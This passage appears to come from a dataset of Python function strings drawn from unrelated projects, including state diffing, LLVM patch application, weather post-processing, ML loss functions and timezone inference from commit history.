df_from_nerc_in_database=df_from_nerc_in_database.assign(action= np.where(df_from_nerc_in_database_outdated ,'update', ''))\n df_update=df_from_nerc_in_database[df_from_nerc_in_database['action']=='update']\n if len(df_update)==0: # make sure not to return empty dataframes! \n df_update=None\n else:\n df_update=None\n \n return df_insert,df_update\n \n else:\n df_insert,df_update=None,None\n \n return df_insert,df_update #df_insert/df_update.shape=(n,7) only 7 initial columns!", "def _state_diff(\n old_state: State, new_state: State\n) -> dict[str, dict[str, dict[str, dict[str, str | list[str]]]]]:\n additions: dict[str, Any] = {}\n diff: dict[str, dict[str, Any]] = {STATE_DIFF_ADDITIONS: additions}\n new_state_context = new_state.context\n old_state_context = old_state.context\n if old_state.state != new_state.state:\n additions[COMPRESSED_STATE_STATE] = new_state.state\n if old_state.last_changed != new_state.last_changed:\n additions[COMPRESSED_STATE_LAST_CHANGED] = new_state.last_changed.timestamp()\n elif old_state.last_updated != new_state.last_updated:\n additions[COMPRESSED_STATE_LAST_UPDATED] = new_state.last_updated.timestamp()\n if old_state_context.parent_id != new_state_context.parent_id:\n additions[COMPRESSED_STATE_CONTEXT] = {\"parent_id\": new_state_context.parent_id}\n if old_state_context.user_id != new_state_context.user_id:\n if COMPRESSED_STATE_CONTEXT in additions:\n additions[COMPRESSED_STATE_CONTEXT][\"user_id\"] = new_state_context.user_id\n else:\n additions[COMPRESSED_STATE_CONTEXT] = {\"user_id\": new_state_context.user_id}\n if old_state_context.id != new_state_context.id:\n if COMPRESSED_STATE_CONTEXT in additions:\n additions[COMPRESSED_STATE_CONTEXT][\"id\"] = new_state_context.id\n else:\n additions[COMPRESSED_STATE_CONTEXT] = new_state_context.id\n if (old_attributes := old_state.attributes) != (\n new_attributes := new_state.attributes\n ):\n for key, value in new_attributes.items():\n if old_attributes.get(key) != value:\n additions.setdefault(COMPRESSED_STATE_ATTRIBUTES, {})[key] = value\n if removed := set(old_attributes).difference(new_attributes):\n # sets are not JSON serializable by default so we convert to list\n # here if there are any values to avoid jumping into the json_encoder_default\n # for every state diff with a removed attribute\n diff[STATE_DIFF_REMOVALS] = {COMPRESSED_STATE_ATTRIBUTES: list(removed)}\n return {ENTITY_EVENT_CHANGE: {new_state.entity_id: diff}}", "def _consolidate_spont_results(self):\n\n # SPONT vs. SPONT\n\n # 1) deal with numeric results for spont spont\n df = self.numeric_results.copy()\n mean_cols = [c for c in df.columns if '_sem' not in c]\n err_cols = [c for c in df.columns if '_sem' in c]\n\n spont_spont_mean = df.loc[pd.IndexSlice[self.spont_stimulus_pairs, :], :][mean_cols].groupby(by='n_components').mean()\n spont_spont_sem = df.loc[pd.IndexSlice[self.spont_stimulus_pairs, :], :][err_cols].groupby(by='n_components').apply(error_prop)\n spont_spont = pd.concat([spont_spont_mean, spont_spont_sem], axis=1)\n new_idx = pd.MultiIndex.from_tuples([pd.Categorical(('spont_spont', n_components)) \n for n_components in spont_spont.index], names=['combo', 'n_components'])\n spont_spont.set_index(new_idx, inplace=True)\n\n # drop individual spont_spont pairs from master df\n df = df[~df.index.get_level_values('combo').isin(self.spont_stimulus_pairs)]\n\n # add new spont results to df\n df = spont_spont.append(df)\n self.numeric_results = df.copy()\n\n\n # 2) deal with array results for spont_spont\n for obj in self.object_keys:\n df = self.array_results[obj].copy()\n sp_df = df.loc[pd.IndexSlice[self.spont_stimulus_pairs, :], :]\n\n if 'evecs' in obj:\n m = [np.nanmean(reflect_eigenvectors(x), axis=0) for x in [np.stack([a for a in arr[1]['mean'].values]) for arr in sp_df.groupby('n_components')]]\n sem = [error_prop(x, axis=0) for x in [np.stack([a for a in arr[1]['sem'].values]) for arr in sp_df.groupby('n_components')]]\n else:\n m = [np.nanmean(x, axis=0) for x in [np.stack([a for a in arr[1]['mean'].values]) for arr in sp_df.groupby('n_components')]]\n sem = [error_prop(x, axis=0) for x in [np.stack([a for a in arr[1]['sem'].values]) for arr in sp_df.groupby('n_components')]]\n \n components = [arr[0] for arr in sp_df.groupby('n_components')]\n new_idx = pd.MultiIndex.from_tuples([pd.Categorical(('spont_spont', n_components)) \n for n_components in components], names=['combo', 'n_components'])\n new_df = pd.DataFrame(index=new_idx, columns=['mean', 'sem'])\n new_df['mean'] = m\n new_df['sem'] = sem\n\n df = df[~df.index.get_level_values('combo').isin(self.spont_stimulus_pairs)]\n df = new_df.append(df)\n \n self.array_results[obj] = df.copy()\n\n self.spont_stimulus_pairs = ['spont_spont']\n\n\n # SPONT vs. EVOKED\n df = self.numeric_results.copy()\n unique_evoked_bins = np.unique([[c.split('_')[0], c.split('_')[1]] for c in self.evoked_stimulus_pairs])\n\n # 1) deal with numeric results\n new_sp_ev_pairs = []\n for stim in unique_evoked_bins:\n # get all spont / evoked combos\n sp_ev = np.unique([c for c in self.spont_evoked_stimulus_pairs if stim in c])\n m = df.loc[pd.IndexSlice[sp_ev, :], :][mean_cols].groupby(by='n_components').mean()\n sem = df.loc[pd.IndexSlice[sp_ev, :], :][err_cols].groupby(by='n_components').apply(error_prop)\n sp_ev_df = pd.concat([m, sem], axis=1)\n new_idx = pd.MultiIndex.from_tuples([pd.Categorical(('spont_{}'.format(stim), n_components)) \n for n_components in sp_ev_df.index], names=['combo', 'n_components']) \n sp_ev_df.set_index(new_idx, inplace=True)\n df = sp_ev_df.append(df)\n new_sp_ev_pairs.append('spont_{}'.format(stim))\n\n # remove inividual spont_evoked pairs \n df = df[~df.index.get_level_values('combo').isin(self.spont_evoked_stimulus_pairs)] \n\n # save updated dataframe for numeric results\n self.numeric_results = df.copy()\n\n # 2) deal with object results\n for obj in self.object_keys:\n df = self.array_results[obj].copy()\n for stim in unique_evoked_bins:\n sp_ev = np.unique([c for c in self.spont_evoked_stimulus_pairs if stim in c])\n sp_df = df.loc[pd.IndexSlice[sp_ev, :], :]\n\n if 'evecs' in obj:\n m = [np.nanmean(reflect_eigenvectors(x), axis=0) for x in [np.stack([a for a in arr[1]['mean'].values]) for arr in sp_df.groupby('n_components')]]\n sem = [error_prop(x, axis=0) for x in [np.stack([a for a in arr[1]['sem'].values]) for arr in sp_df.groupby('n_components')]]\n else:\n m = [np.nanmean(x, axis=0) for x in [np.stack([a for a in arr[1]['mean'].values]) for arr in sp_df.groupby('n_components')]]\n sem = [error_prop(x, axis=0) for x in [np.stack([a for a in arr[1]['sem'].values]) for arr in sp_df.groupby('n_components')]]\n components = [arr[0] for arr in sp_df.groupby('n_components')]\n new_idx = pd.MultiIndex.from_tuples([pd.Categorical(('spont_{}'.format(stim), n_components)) \n for n_components in components], names=['combo', 'n_components'])\n new_df = pd.DataFrame(index=new_idx, columns=['mean', 'sem'])\n new_df['mean'] = m\n new_df['sem'] = sem\n\n df = df[~df.index.get_level_values('combo').isin(self.spont_evoked_stimulus_pairs)]\n df = new_df.append(df)\n self.array_results[obj] = df\n\n # update self.spont_evoked_stimulus_pairs\n self.spont_evoked_stimulus_pairs = new_sp_ev_pairs \n\n # no need to return anything... just update object attributes", "def run(self):\n try:\n diff = self.get_diff(self.diff_id)\n revision = self.get_revision(diff.revisionID)\n url = f\"https://reviews.llvm.org/D{revision['id']}?id={diff['id']}\"\n annotate(f\"Patching changes [{url}]({url})\", style='info', context='patch_diff')\n self.reset_repository()\n self.revision_id = revision['id']\n dependencies = self.get_dependencies(revision)\n dependencies.reverse() # Now revisions will be from oldest to newest.\n if len(dependencies) > 0:\n logging.info('This diff depends on: {}'.format(revision_list_to_str(dependencies)))\n plan = []\n for r in dependencies:\n if r['statusName'] == 'Closed':\n logging.info(f'skipping revision {r[\"id\"]} - it is closed, assuming it has landed')\n continue\n d = self.get_diff(r['diffs'][0])\n plan.append((r, d))\n plan.append((revision, diff))\n logging.info('Planning to apply in order:')\n for (r, d) in plan:\n logging.info(f\"https://reviews.llvm.org/D{r['id']}?id={d['id']}\")\n # Pick the newest known commit as a base for patches.\n base_commit = None\n for (r, d) in plan:\n c = self.find_commit(d['sourceControlBaseRevision'])\n if c is None:\n logging.warning(f\"D{r['id']}#{d['id']} commit {d['sourceControlBaseRevision']} does not exist\")\n continue\n if base_commit is None:\n logging.info(f\"D{r['id']}#{d['id']} commit {c.hexsha} exists\")\n base_commit = c\n elif c.committed_datetime > base_commit.committed_datetime:\n logging.info(f\"D{r['id']}#{d['id']} commit {c.hexsha} has a later commit date then\"\n f\"{base_commit.hexsha}\")\n base_commit = c\n if self.base_revision != 'auto':\n logging.info(f'Base revision \"{self.base_revision}\" is set by command argument. Will use '\n f'instead of resolved \"{base_commit}\"')\n base_commit = self.find_commit(self.base_revision)\n if base_commit is None:\n base_commit = self.repo.heads['main'].commit\n annotate(f\"Cannot find a base git revision. Will use current HEAD.\",\n style='warning', context='patch_diff')\n self.create_branch(base_commit)\n for (r, d) in plan:\n if not self.apply_diff(d, r):\n return 1\n if self.push_branch:\n self.repo.git.push('--force', 'origin', self.branch_name)\n annotate(f\"Created branch [{self.branch_name}]\"\n f\"(https://github.com/llvm-premerge-tests/llvm-project/tree/{self.branch_name}).\\n\\n\"\n f\"To checkout locally, run in your copy of llvm-project directory:\\n\\n\"\n \"```shell\\n\"\n \"git remote add premerge git@github.com:llvm-premerge-tests/llvm-project.git #first time\\n\"\n f\"git fetch premerge {self.branch_name}\\n\"\n f\"git checkout -b {self.branch_name} --track premerge/{self.branch_name}\\n\"\n \"```\",\n style='success',\n context='patch_diff')\n logging.info('Branch {} has been pushed'.format(self.branch_name))\n return 0\n except Exception as e:\n annotate(f\":bk-status-failed: Unexpected error. Consider [creating a bug]({feedback_url()}).\",\n style='error', context='patch_diff')\n logging.error(f'exception: {e}')\n return 1", "def svn_client_diff_summarize2(char_path1, svn_opt_revision_t_revision1, char_path2, svn_opt_revision_t_revision2, svn_depth_t_depth, svn_boolean_t_ignore_ancestry, apr_array_header_t_changelists, svn_client_diff_summarize_func_t_summarize_func, void_summarize_baton, svn_client_ctx_t_ctx, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass", "def compute_feedback_gradients(self, h_previous_corrupted, sigma):\n\n self.set_feedback_requires_grad(True)\n\n h_current = self.dummy_forward(h_previous_corrupted)\n h = self.propagate_backward(h_current)\n\n if sigma < 0.02:\n scale = 1/0.02**2\n else:\n scale = 1/sigma**2\n reconstruction_loss = scale * F.mse_loss(h, h_previous_corrupted)\n\n self.save_feedback_gradients(reconstruction_loss)\n\n self.set_feedback_requires_grad(False)", "def calculate_loss(estimated_separation, true_separation, mask, true_latents, estimated_mix, true_mix, args):\n stats = torch.zeros(7).to(mask.device)\n\n sdr = sdr_objective(estimated_separation, true_separation, mask)\n stats[:4] = sdr\n total_loss = -sdr.sum()\n\n reconstruction_sdr = sdr_objective(estimated_mix, true_mix).mean() if args.reconstruction_loss_weight > 0 else 0.0\n stats[4] = reconstruction_sdr\n total_loss += -args.reconstruction_loss_weight * reconstruction_sdr\n\n if args.similarity_loss_weight > 0.0 or args.dissimilarity_loss_weight > 0.0:\n mask = mask.squeeze(-1)\n true_latents = true_latents * mask.unsqueeze(-1).unsqueeze(-1)\n true_latents = true_latents.transpose(0, 1)\n\n dissimilarity = dissimilarity_loss(true_latents, mask) if args.dissimilarity_loss_weight > 0.0 else 0.0\n stats[5] = dissimilarity\n total_loss += args.dissimilarity_loss_weight * dissimilarity\n\n similarity = similarity_loss(true_latents, mask) if args.similarity_loss_weight > 0.0 else 0.0\n stats[6] = similarity\n total_loss += -args.similarity_loss_weight * similarity\n\n return total_loss, stats", "def print_diff_summary(self, other, **kwargs):\r\n\r\n def diff_dict(a_time, b_time_):\r\n r = {}\r\n b_time = copy.copy(b_time_)\r\n for a, ta in a_time.items():\r\n r.setdefault(a, 0)\r\n tb = b_time.pop(a, 0)\r\n r[a] += ta - tb\r\n\r\n #they are missing in a\r\n for a, t in b_time.items():\r\n r.setdefault(a, 0)\r\n r[a] += t\r\n return r\r\n\r\n compile_time = self.compile_time - other.compile_time\r\n fct_call_time = diff_dict(self.fct_call_time, other.fct_call_time)\r\n fct_call = diff_dict(self.fct_call, other.fct_call)\r\n apply_time = diff_dict(self.apply_time, other.apply_time)\r\n apply_cimpl = self.apply_cimpl and other.apply_cimpl\r\n message = self.message\r\n variable_shape = diff_dict(self.variable_shape, other.variable_shape)\r\n self_linker_time = sum([ps.linker_time for ps\r\n in self.profile_stats.values()])\r\n other_linker_time = sum([ps.linker_time for ps\r\n in other.profile_stats.values()])\r\n self_optimizer_time = sum([ps.optimizer_time for ps\r\n in self.profile_stats.values()])\r\n other_optimizer_time = sum([ps.optimizer_time for ps\r\n in other.profile_stats.values()])\r\n\r\n other_time = {'linker_time': self_linker_time - other_linker_time,\r\n 'optimizer_time': self_optimizer_time -\r\n other_optimizer_time}\r\n self.print_summary_(\"print_diff_summary\", compile_time,\r\n fct_call_time, fct_call,\r\n apply_time, apply_cimpl, message, variable_shape,\r\n print_apply=False, other_time=other_time,\r\n **kwargs)", "def postIdealizedAnalysis(inpath, outpath, member,\n refpath='/lustre/research/bancell/aucolema/HWT2016runs/2016050800/wrfoutREF'):\n # SENSvals file naming conventions\n sensval_varstrings = [\"GPH_300\", \"GPH_500\", \"GPH_700\", \"GPH_850\", \"SKIP\",\n \"T_300\", \"T_500\", \"T_700\", \"T_850\", \"T_925\",\n \"U_300\", \"U_500\", \"U_700\", \"U_850\", \"U_925\",\n \"V_300\", \"V_500\", \"V_700\", \"V_850\", \"V_925\",\n \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\",\n \"SKIP\", \"SKIP\", \"Q_850\", \"SKIP\", \"SLP\", \"T2\",\n \"TD2\", \"U10\", \"V10\"]\n # Post-processed new file naming conventions\n sensstringslist = [\"300 hPa GPH\",\"500 hPa GPH\",\"700 hPa GPH\",\n \"850 hPa GPH\",\"925 hPa GPH\",\"300 hPa T\",\"500 hPa T\",\n \"700 hPa T\",\"850 hPa T\",\"925 hPa T\",\"300 hPa U-Wind\",\n \"500 hPa U-Wind\",\"700 hPa U-Wind\",\"850 hPa U-Wind\",\n \"925 hPa U-Wind\",\"300 hPa V-Wind\",\"500 hPa V-Wind\",\n \"700 hPa V-Wind\",\"850 hPa V-Wind\",\"925 hPa V-Wind\",\n \"300 hPa Dewpt\", \"500 hPa Dewpt\", \"700 hPa Dewpt\",\n \"850 hPa Dewpt\", \"925 hPa Dewpt\", \"300 hPa Q\",\n \"500 hPa Q\", \"700 hPa Q\", \"850 hPa Q\", \"925 hPa Q\",\n \"SLP\",\"2m Temp\",\"2m Dewpt\",\n \"10m U-Wind\",\"10m V-Wind\"]\n\n # Get more dimensions/geographical info\n wrf_d1 = Dataset(refpath)\n lons, lats = wrf_d1.variables['XLONG'][0], wrf_d1.variables['XLAT'][0]\n wrf_idim = len(lons[0,:])\n wrf_jdim = len(lats[:,0])\n\n # Write interpolated variables to netCDF\n new_analysis = Dataset(outpath, \"w\", format=\"NETCDF4\")\n new_analysis.createDimension('lat', wrf_jdim)\n new_analysis.createDimension('lon', wrf_idim)\n new_analysis.createDimension('time', None)\n xlat = new_analysis.createVariable(\"XLAT\", float, dimensions=('lat','lon'))\n xlat[:,:] = lats\n xlon = new_analysis.createVariable(\"XLONG\", float, dimensions=('lat','lon'))\n xlon[:,:] = lons\n\n # Open dataset and start pulling member fields\n member_fields = np.zeros((len(sensval_varstrings), wrf_jdim, wrf_idim))\n sensvar_dat = Dataset(inpath)\n for ind, var in enumerate(sensval_varstrings):\n # print(\"SENSvals variable:\", var, \"New variable string\", sensstringslist[ind])\n if var != \"SKIP\":\n member_fields[ind] = sensvar_dat[var][member-1][:]\n newvar = new_analysis.createVariable(\n sensstringslist[ind].replace(\" \",\"_\"),\n member_fields[ind].dtype,\n dimensions=('lat','lon'))\n newvar[:,:] = member_fields[ind]\n new_analysis.close()\n return", "def postIdealizedAnalysis(inpath, outpath, member,\n refpath='/lustre/research/bancell/aucolema/HWT2016runs/2016050800/wrfoutREF'):\n # SENSvals file naming conventions\n sensval_varstrings = [\"GPH_300\", \"GPH_500\", \"GPH_700\", \"GPH_850\", \"SKIP\",\n \"T_300\", \"T_500\", \"T_700\", \"T_850\", \"T_925\",\n \"U_300\", \"U_500\", \"U_700\", \"U_850\", \"U_925\",\n \"V_300\", \"V_500\", \"V_700\", \"V_850\", \"V_925\",\n \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\",\n \"SKIP\", \"SKIP\", \"Q_850\", \"SKIP\", \"SLP\", \"T2\",\n \"TD2\", \"U10\", \"V10\"]\n # Post-processed new file naming conventions\n sensstringslist = [\"300 hPa GPH\",\"500 hPa GPH\",\"700 hPa GPH\",\n \"850 hPa GPH\",\"925 hPa GPH\",\"300 hPa T\",\"500 hPa T\",\n \"700 hPa T\",\"850 hPa T\",\"925 hPa T\",\"300 hPa U-Wind\",\n \"500 hPa U-Wind\",\"700 hPa U-Wind\",\"850 hPa U-Wind\",\n \"925 hPa U-Wind\",\"300 hPa V-Wind\",\"500 hPa V-Wind\",\n \"700 hPa V-Wind\",\"850 hPa V-Wind\",\"925 hPa V-Wind\",\n \"300 hPa Dewpt\", \"500 hPa Dewpt\", \"700 hPa Dewpt\",\n \"850 hPa Dewpt\", \"925 hPa Dewpt\", \"300 hPa Q\",\n \"500 hPa Q\", \"700 hPa Q\", \"850 hPa Q\", \"925 hPa Q\",\n \"SLP\",\"2m Temp\",\"2m Dewpt\",\n \"10m U-Wind\",\"10m V-Wind\"]\n\n # Get more dimensions/geographical info\n wrf_d1 = Dataset(refpath)\n lons, lats = wrf_d1.variables['XLONG'][0], wrf_d1.variables['XLAT'][0]\n wrf_idim = len(lons[0,:])\n wrf_jdim = len(lats[:,0])\n\n # Write interpolated variables to netCDF\n new_analysis = Dataset(outpath, \"w\", format=\"NETCDF4\")\n new_analysis.createDimension('lat', wrf_jdim)\n new_analysis.createDimension('lon', wrf_idim)\n new_analysis.createDimension('time', None)\n xlat = new_analysis.createVariable(\"XLAT\", float, dimensions=('lat','lon'))\n xlat[:,:] = lats\n xlon = new_analysis.createVariable(\"XLONG\", float, dimensions=('lat','lon'))\n xlon[:,:] = lons\n\n # Open dataset and start pulling member fields\n member_fields = np.zeros((len(sensval_varstrings), wrf_jdim, wrf_idim))\n sensvar_dat = Dataset(inpath)\n for ind, var in enumerate(sensval_varstrings):\n # print(\"SENSvals variable:\", var, \"New variable string\", sensstringslist[ind])\n if var != \"SKIP\":\n member_fields[ind] = sensvar_dat[var][member-1][:]\n newvar = new_analysis.createVariable(\n sensstringslist[ind].replace(\" \",\"_\"),\n member_fields[ind].dtype,\n dimensions=('lat','lon'))\n newvar[:,:] = member_fields[ind]\n new_analysis.close()\n return", "def _pop_path(diffs):\n key = None\n popped_diffs = []\n for d in diffs:\n # Empty diffs can be skipped\n if d is None or len(d) == 0:\n popped_diffs.append(None)\n continue\n # Check that we have only one op, which is a patch op\n if len(d) != 1 or d[0].op != DiffOp.PATCH:\n return\n # Ensure all present diffs have the same key\n if key is None:\n key = d[0].key\n elif key != d[0].key:\n return\n # Ensure the sub diffs of all ops are suitable as outer layer\n # if d[0].diff.length > 1:\n # return\n popped_diffs.append(d[0].diff)\n if key is None:\n return\n return {'key': key, 'diffs': popped_diffs}", "def analyze(errors_log_fp: str, visualization_fp: str):\n # Read lines from errors log\n with open(errors_log_fp, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n\n # Process lines\n tn_error_cases, itn_error_cases = [], []\n for ix in range(0, len(lines), 8):\n mode_line = lines[ix]\n info_lines = lines[ix + 1 : ix + 7]\n # Append new error case\n if mode_line.startswith('Forward Problem'):\n mode = constants.TN_MODE\n tn_error_cases.append(ErrorCase.from_lines(info_lines, mode))\n elif mode_line.startswith('Backward Problem'):\n mode = constants.ITN_MODE\n itn_error_cases.append(ErrorCase.from_lines(info_lines, mode))\n\n # Basic stats\n print('---- Text Normalization ----')\n print('Number of TN errors: {}'.format(len(tn_error_cases)))\n\n print('---- Inverse Text Normalization ---- ')\n print('Number of ITN errors: {}'.format(len(itn_error_cases)))\n\n # Produce a visualization\n with open(visualization_fp, 'w+', encoding='utf-8') as f:\n # Appendix\n f.write('Appendix</br>')\n f.write('<a href=\"#tn_section\">Text Normalization Analysis.</a></br>')\n f.write('<a href=\"#itn_section\">Inverse Text Normalization Analysis.</a>')\n\n # TN Section\n f.write('<h2 id=\"tn_section\">Text Normalization</h2>\\n')\n for errorcase in tn_error_cases:\n f.write(errorcase.get_html())\n\n # ITN Section\n f.write('<h2 id=\"itn_section\">Inverse Text Normalization</h2>\\n')\n for errorcase in itn_error_cases:\n f.write(errorcase.get_html())", "def getStiff(self, calc, **kwargs):\n elements = [e for e in self.elements if e.dim == 2]\n ns = len(self.nodes)\n self.stiff = zeros((ns, ns))\n for e in elements:\n calc(e)\n indexes = [(n1.i - 1, n2.i-1) for n1 in e.nodes for n2 in e.nodes]\n for i, p in enumerate(indexes):\n x, y = p\n self.stiff[x, y] += e.M.flat[i]\n return self.stiff", "def compareAB(model1_name, model2_name, X_test_B, X_test_S, analysis_dir=\"Analysis/\"):\n #Load best weights\n model = tf.keras.models.load_model(\"Models/\"+model1_name)\n bkg_preds1 = model.predict(X_test_B).flatten()\n sig_preds1 = model.predict(X_test_S).flatten()\n\n model = tf.keras.models.load_model(\"Models/\"+model2_name)\n bkg_preds2 = model.predict(X_test_B).flatten()\n sig_preds2 = model.predict(X_test_S).flatten()\n\n sig_eff = []\n bkg_eff = []\n sig_eff_50 = 1.0\n bkg_eff_50 = 1.0\n for thresh in (1-np.arange(0.00005, 0.8, 0.01)):\n bkg_eff_temp = np.sum(bkg_preds1 > thresh)/len(bkg_preds1)\n sig_eff_temp = np.sum(sig_preds1 > thresh)/len(sig_preds1)\n sig_eff.append(sig_eff_temp)\n bkg_eff.append(1/bkg_eff_temp)\n if abs(sig_eff_temp-0.5) < abs(sig_eff_50-0.5):\n sig_eff_50 = sig_eff_temp\n bkg_eff_50 = 1/bkg_eff_temp\n plt.semilogy(sig_eff, bkg_eff)\n plt.annotate(model1_name + ' Background rejection @0.5 Signal efficiency = {:.2e}'.format(bkg_eff_50), xy=(0.05, 0.95), xycoords='axes fraction')\n print(sig_eff_50)\n\n sig_eff = []\n bkg_eff = []\n sig_eff_50 = 1.0\n bkg_eff_50 = 1.0\n for thresh in (1-np.arange(0.00005, 0.8, 0.01)):\n bkg_eff_temp = np.sum(bkg_preds2 > thresh)/len(bkg_preds2)\n sig_eff_temp = np.sum(sig_preds2 > thresh)/len(sig_preds2)\n sig_eff.append(sig_eff_temp)\n bkg_eff.append(1/bkg_eff_temp)\n if abs(sig_eff_temp-0.5) < abs(sig_eff_50-0.5):\n sig_eff_50 = sig_eff_temp\n bkg_eff_50 = 1/bkg_eff_temp\n plt.semilogy(sig_eff, bkg_eff)\n plt.annotate(model2_name + ' Background rejection @0.5 Signal efficiency = {:.3e}'.format(bkg_eff_50), xy=(0.05, 0.88), xycoords='axes fraction')\n print(sig_eff_50)\n\n plt.legend([model1_name, model2_name])\n plt.xlabel(\"Signal efficiency\")\n plt.ylabel(\"Background rejection\")\n plt.gcf().set_size_inches(8.3, 5.85)\n plt.savefig(analysis_dir+\"ROC\" + model1_name + \"VS\" + model2_name + \".pdf\", format=\"pdf\")\n plt.show()", "def preprocess(self):\n travel_path = []\n current_location = None\n last_valid_location = None\n change_at_day = None\n location_candidate = None\n\n for commit in self.raw_data:\n commit_time = commit.commit_time\n commit_timezone = commit.commit_time_offset\n if commit_timezone is None:\n continue\n\n zones = self.session.query(TimezoneInterval.timezone) \\\n .filter(TimezoneInterval.start <= commit_time) \\\n .filter(TimezoneInterval.end > commit_time) \\\n .filter(TimezoneInterval.utcoffset == commit_timezone) \\\n .all()\n\n # Create the initial timezone\n if current_location is None:\n current_location = {\n 'set': set([z[0] for z in zones]),\n 'full_set': set([z[0] for z in zones]),\n 'start': commit_time.date(),\n 'end': commit_time.date(),\n }\n last_valid_location = commit_time.date()\n\n continue\n\n # We got a timezone and need to check if we are still in it or if there is a change\n # Get possible timezone candidates for this commit and intersect them with the current_location set\n location = set([z[0] for z in zones])\n intersection = location & current_location['set']\n # Check if the possible timezones of this commit matches any timezone of the current set.\n if len(intersection) > 0:\n # By reassigning the intersected set we gain additional precision by considering possible specific DST changes\n current_location['set'] = intersection\n current_location['end'] = commit_time.date()\n last_valid_location = commit_time.date()\n\n # There is no match between the possible timezones and the current set.\n # In this case we need to check if this is a single occurrence (anomaly) or\n # If this is an actual change.\n else:\n # No change_at_day exists, but we detected a change\n # Remember the change. If this change lasts for at least a day it will be marked.\n if change_at_day is None:\n change_at_day = commit.commit_time.date()\n location_candidate = {\n 'set': set([z[0] for z in zones]),\n 'full_set': set([z[0] for z in zones]),\n 'start': commit_time.date(),\n 'end': commit_time.date(),\n }\n\n # No change detected\n if change_at_day is None:\n continue\n\n # There was an anomaly, but not for a whole day.\n # This could for instance be a developer committing from a remote server.\n if change_at_day <= last_valid_location:\n change_at_day = None\n location_candidate = None\n\n continue\n\n # The change is not older than a day\n # ignore it until the change lasts for longer than a day\n if change_at_day <= last_valid_location:\n continue\n\n # There exists a change from the last day.\n duration = current_location['end'] - current_location['start']\n\n # The current_location set exists only for a single day.\n # This is most likely an outlier. Thereby drop it and restore the last timezone.\n if duration < timedelta(days=1) and len(travel_path) > 0:\n last_location = travel_path.pop()\n last_location['end'] = current_location['end']\n current_location = last_location\n\n # Check if the old location and the current candidate actually match\n # If that's the case drop the candidate and completely replace the current_location set\n intersection = location_candidate['set'] & current_location['set']\n if len(intersection) > 0:\n # Update current_timezone\n current_location['set'] = intersection\n current_location['end'] = commit_time.date()\n current_location['full_set'] = current_location['full_set'] | location_candidate['set']\n\n # Reset candidate and last_valid_location occurrence\n last_valid_location = commit_time.date()\n change_at_day = None\n location_candidate = None\n\n continue\n\n # We detected a change and it seems to be valid.\n # Save the current timezone and set the candidate as the current timezone.\n travel_path.append(current_location)\n current_location = location_candidate\n change_at_day = None\n location_candidate = None\n last_valid_location = commit_time.date()\n\n current_location['end'] = datetime.now().date()\n travel_path.append(current_location)\n\n home_location_candidates = []\n home_location = None\n found = False\n # Try to find the current home timezone:\n for location in travel_path:\n duration = location['end'] - location['start']\n\n # Try to find a set which intersects with the current set\n for candidate in home_location_candidates:\n intersection = location['set'] & candidate['set']\n # Found an intersection, set the new intersection and increment days\n if len(intersection) > 0:\n candidate['set'] = intersection\n candidate['days'] += duration.days\n candidate['full_set'] = location['full_set'] | candidate['full_set']\n found = True\n if candidate['days'] > home_location['days']:\n home_location = candidate\n\n break\n\n if not found:\n location['days'] = duration.days\n home_location_candidates.append(location)\n else:\n found = False\n\n if not home_location:\n home_location = location\n\n self.data = travel_path\n self.home_zone = home_location\n self.different_timezones = len(home_location_candidates)", "def print_diff_summary(self, other, **kwargs):\n\n def diff_dict(a_time, b_time_):\n r = {}\n b_time = copy.copy(b_time_)\n for a, ta in iteritems(a_time):\n r.setdefault(a, 0)\n tb = b_time.pop(a, 0)\n r[a] += ta - tb\n\n # they are missing in a\n for a, t in iteritems(b_time):\n r.setdefault(a, 0)\n r[a] += t\n return r\n\n compile_time = self.compile_time - other.compile_time\n fct_call_time = diff_dict(self.fct_call_time, other.fct_call_time)\n fct_call = diff_dict(self.fct_call, other.fct_call)\n apply_time = diff_dict(self.apply_time, other.apply_time)\n apply_cimpl = self.apply_cimpl and other.apply_cimpl\n message = self.message\n variable_shape = diff_dict(self.variable_shape, other.variable_shape)\n self_linker_time = sum([ps.linker_time for ps\n in self.profile_stats.values()])\n other_linker_time = sum([ps.linker_time for ps\n in other.profile_stats.values()])\n self_optimizer_time = sum([ps.optimizer_time for ps\n in self.profile_stats.values()])\n other_optimizer_time = sum([ps.optimizer_time for ps\n in other.profile_stats.values()])\n\n other_time = {'linker_time': self_linker_time - other_linker_time,\n 'optimizer_time': self_optimizer_time -\n other_optimizer_time}\n self.print_summary_(\"print_diff_summary\", compile_time,\n fct_call_time, fct_call,\n apply_time, apply_cimpl, message, variable_shape,\n print_apply=False, other_time=other_time,\n **kwargs)", "def _get_draft_details(request, comments):\n last_key = None\n output = []\n linecache = {} # Maps (c.patch_key, c.left) to mapping (lineno, line)\n modified_patches = []\n fetch_base_failed = False\n\n for c in comments:\n patch = c.patch_key.get()\n if (patch.key, c.left) != last_key:\n url = request.build_absolute_uri(\n reverse(diff, args=[request.issue.key.id(),\n patch.patchset_key.id(),\n patch.filename]))\n output.append('\\n%s\\nFile %s (%s):' % (url, patch.filename,\n c.left and \"left\" or \"right\"))\n last_key = (patch.key, c.left)\n if patch.no_base_file:\n linecache[last_key] = _patchlines2cache(\n patching.ParsePatchToLines(patch.lines), c.left)\n else:\n try:\n if c.left:\n old_lines = patch.get_content().text.splitlines(True)\n linecache[last_key] = dict(enumerate(old_lines, 1))\n else:\n new_lines = patch.get_patched_content().text.splitlines(True)\n linecache[last_key] = dict(enumerate(new_lines, 1))\n except FetchError:\n linecache[last_key] = _patchlines2cache(\n patching.ParsePatchToLines(patch.lines), c.left)\n fetch_base_failed = True\n context = linecache[last_key].get(c.lineno, '').strip()\n url = request.build_absolute_uri(\n '%s#%scode%d' % (reverse(diff, args=[request.issue.key.id(),\n patch.patchset_key.id(),\n patch.filename]),\n c.left and \"old\" or \"new\",\n c.lineno))\n output.append('\\n%s\\n%s:%d: %s\\n%s' % (url, patch.filename, c.lineno,\n context, c.text.rstrip()))\n if modified_patches:\n ndb.put_multi(modified_patches)\n return '\\n'.join(output)", "def __do_analysis(self):\n #Step 1: connect to mongodb and pick a streamer\n dbclient = db_connect.DBClient()\n streamer_data = dbclient.analyze_number_of_stream_viewers(self.streamer)\n streamer_messeges_data = dbclient.analyzeStream(self.streamer)\n\n timearr = []\n messagesarr = []\n streamer_timearr = []\n num_chattersarr = []\n\n #create time and messages array 